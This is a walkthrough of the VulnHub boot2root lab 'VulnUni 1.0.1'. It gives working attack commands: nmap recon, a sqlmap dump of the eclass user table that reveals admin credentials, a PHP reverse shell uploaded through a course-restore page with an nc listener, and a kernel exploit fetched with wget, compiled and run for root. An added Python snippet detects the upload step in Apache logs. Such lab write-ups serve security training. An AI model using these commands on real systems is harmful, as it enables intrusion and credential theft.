VulnUni: 1.0.1 | walkthrough | writeup | vulnhub
DESCRIPTION:
Welcome to "Vuln Uni"!
This boot2root machine is realistic without any CTF elements and pretty straightforward.
Goal: Hack your University and get root access to the server.
To successfully complete the challenge you need to get user and root flags.
Difficulty: Easy / Beginner Level
https://emaragkos.gr/vulnhub-writeups/vulnhub-boot2root-machine-vulnuni/
Need hints? Twitter @emaragkos
DHCP is enabled
Your feedback is really valuable for me!
Was there something that you didn’t like about this VM?
Please let me know so that I can make more interesting challenges in the future.
Good luck and have fun :)
Changelog:
v1.0.1 - 2020-03-20
v1.0 - 2020-03-19
DOWNLOAD LINK: https://download.vulnhub.com/vulnuni/vulnuni1.0.1.ova
Let's find the IP address of the machine with the tool named netdiscover:
netdiscover -i vboxnet0
- -i device: your network device
- To find the name of your network device, use the ifconfig command
Now let's start with an nmap scan:
nmap -v -sCV -A -O -p- 192.168.56.103
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni — We train the top Information Security Professionals
Only one port is open here. Let's enumerate…
@port 80:
Let's browse the full site manually and check the source code as well.
Found a comment in the source code of the courses page saying to disable the page “vulnuni-eclass-platform.html” until the new version is installed.
Let's visit the commented page manually.
Found a redirection to the login page.
Page not found due to the A record, as it redirects to “vulnuni.local/vulnuni-eclass/index.php”.
Let's edit our hosts file:
vim /etc/hosts
Let's try again.
Here it is. I tried some default usernames and passwords like admin:admin and user:password, but they didn't work.
Found the currently installed eclass version; let's google for vulnerabilities in eclass version 1.7.2.
Got a vulnerability: error-based SQLi on a particular parameter.
Let's use these parameters. As we don't have an account, we will go for time-based blind injection, as described in the above exploit.
sqlmap -u "http://vulnuni.local/vulnuni-eclass/index.php" --dump -D eclass -T user -C username,password --forms --crawl=2
Got a login with admin privileges, using the credentials extracted from MySQL:
admin : ilikecats89
Let's follow the other part of the same exploit to get a reverse shell.
Navigate to /modules/course_info/restore_course.php.
Let's compress our shell into a zip file:
zip bla.zip php-reverse-shell.php
Upload the zip file and start a nc listener:
nc -lvp 4455
Now we just have to call the given location in the browser, “/courses/tmpUnzipping/php-reverse-shell.php”, and we will get a shell.
Got a shell as www-data and converted it into a stty shell.
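For the defender's side of the upload step above, this added example (not part of the original writeup) scans Apache combined-format access log lines for requests to PHP files under /courses/tmpUnzipping/ and links each one to a preceding POST to restore_course.php from the same client. The log lines are constructed, and the function name is an assumption.

```python
import re
from datetime import datetime

# Paths come from the walkthrough; everything else here is illustrative.
UPLOAD_PATH = "/modules/course_info/restore_course.php"
UNZIP_DIR = "/courses/tmpUnzipping/"

# Apache combined log format: client IP, [timestamp], "METHOD path protocol"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"'
)

def find_unzip_script_hits(lines):
    """Flag requests for .php files in the unzip directory.

    Returns (ip, path, upload_time) tuples; upload_time is the most recent
    restore_course.php POST from the same client, or None if there was none.
    """
    last_upload = {}  # client IP -> time of latest restore POST
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if m["method"] == "POST" and path.endswith(UPLOAD_PATH):
            last_upload[m["ip"]] = ts
        elif UNZIP_DIR in path and path.lower().endswith(".php"):
            hits.append((m["ip"], path, last_upload.get(m["ip"])))
    return hits

# Constructed sample log lines (not captured from the lab machine).
SAMPLE = [
    '192.168.56.1 - - [20/Mar/2020:10:01:02 +0000] "GET /vulnuni-eclass/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [20/Mar/2020:10:05:10 +0000] "POST /vulnuni-eclass/modules/course_info/restore_course.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [20/Mar/2020:10:05:40 +0000] "GET /vulnuni-eclass/courses/tmpUnzipping/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.56.7 - - [20/Mar/2020:10:06:00 +0000] "GET /vulnuni-eclass/courses/tmpUnzipping/notes.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.168.56.9 - - [20/Mar/2020:10:07:00 +0000] "GET /vulnuni-eclass/courses/tmpUnzipping/test.php?x=1 HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, uploaded in find_unzip_script_hits(SAMPLE):
        print(f"{ip} requested {path}; prior restore upload: {uploaded}")
```

A hit with no prior upload still deserves a look, since the upload and the request can come from different client addresses.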
Privilege Escalation:
Didn't find anything interesting on the box other than the kernel version, which is exploitable. I downloaded the exploit, which I found on GitHub.
Get it downloaded to the victim's machine with the help of a Python server:
python -m SimpleHTTPServer 1234
wget http://192.168.56.1:1234/exploit.c
Let's compile and run the exploit:
gcc exploit.c -o exploit -Wall -ldl -lpthread
chmod +x exploit
./exploit
got ROOT
DONE.